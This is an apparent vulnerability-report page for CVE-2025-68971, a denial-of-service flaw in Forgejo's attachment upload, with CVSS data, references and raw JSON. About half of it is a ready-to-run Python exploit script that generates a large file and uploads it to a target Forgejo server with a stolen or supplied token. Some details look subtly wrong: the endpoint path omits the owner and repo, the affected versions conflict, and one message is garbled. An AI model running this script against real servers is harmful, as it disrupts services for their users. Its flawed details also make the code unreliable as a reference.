Security Vulnerability Report
CVE-2025-68971 CVSS 6.5 MEDIUM

CVE-2025-68971

Published: 2026-03-16 20:16:15
Last Modified: 2026-04-27 19:18:47

Description

In Forgejo through 13.0.3, the attachment component allows a denial of service by uploading a multi-gigabyte file attachment (e.g., to be associated with an issue or a release).

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

Forgejo < 13.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-68971 PoC - Forgejo Attachment Upload DoS
This PoC demonstrates uploading a large file to trigger DoS in Forgejo < 13.0.3
"""
import requests
import sys
import os


def create_large_file(size_mb=1024):
    """Generate a large file for upload"""
    filename = 'large_test_file.bin'
    chunk_size = 1024 * 1024  # 1MB chunks
    with open(filename, 'wb') as f:
        for _ in range(size_mb):
            f.write(b'\x00' * chunk_size)
    return filename


def upload_large_attachment(base_url, token, issue_id, filename):
    """
    Upload large file as attachment to trigger DoS
    """
    upload_url = f"{base_url}/api/v1/repos/issues/attachments"
    headers = {
        'Authorization': f'token {token}',
        'Accept': 'application/json'
    }
    with open(filename, 'rb') as f:
        files = {'file': (filename, f)}
        data = {'issue_id': issue_id}
        print(f"[*] Uploading large file to {upload_url}...")
        print(f"[*] File size: {os.path.getsize(filename) / (1024*1024):.2f} MB")
        try:
            response = requests.post(upload_url, headers=headers, files=files, data=data, timeout=300)
            print(f"[+] Response status: {response.status_code}")
            if response.status_code == 200:
                print("[+] File uploaded successfully - DoS condition triggered")
            return response
        except requests.exceptions.RequestException as e:
            print(f"[-] Upload failed: {e}")
            return None


def main():
    if len(sys.argv) < 5:
        print("Usage: python3 cve-2025-68971-poc.py <forgejo_url> <token> <issue_id> <file_size_mb>")
        sys.exit(1)
    base_url = sys.argv[1].rstrip('/')
    token = sys.argv[2]
    issue_id = sys.argv[3]
    size_mb = int(sys.argv[4])
    print(f"[*] Creating {size_mb}MB test file...")
    filename = create_large_file(size_mb)
    try:
        upload_large_attachment(base_url, token, issue_id, filename)
    finally:
        if os.path.exists(filename):
            os.remove(filename)
            print(f"[*] Cleaned up (unknown)")


if __name__ == "__main__":
    main()

References

https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=291973
https://codeberg.org/forgejo/forgejo
https://zenodo.org/records/18945481
https://zenodo.org/records/19058493

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68971", "sourceIdentifier": "[email protected]", "published": "2026-03-16T20:16:14.863", "lastModified": "2026-04-27T19:18:46.690", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Forgejo through 13.0.3, the attachment component allows a denial of service by uploading a multi-gigabyte file attachment (e.g., to be associated with an issue or a release)."}, {"lang": "es", "value": "En Forgejo hasta la versión 13.0.3, el componente de adjuntos permite una denegación de servicio al subir un archivo adjunto de varios gigabytes (por ejemplo, para asociarlo con una incidencia o una versión)."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "references": [{"url": "https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=291973", "source": "[email protected]"}, {"url": "https://codeberg.org/forgejo/forgejo", "source": "[email protected]"}, {"url": "https://zenodo.org/records/18945481", "source": "[email protected]"}, {"url": "https://zenodo.org/records/19058493", "source": "[email protected]"}]}}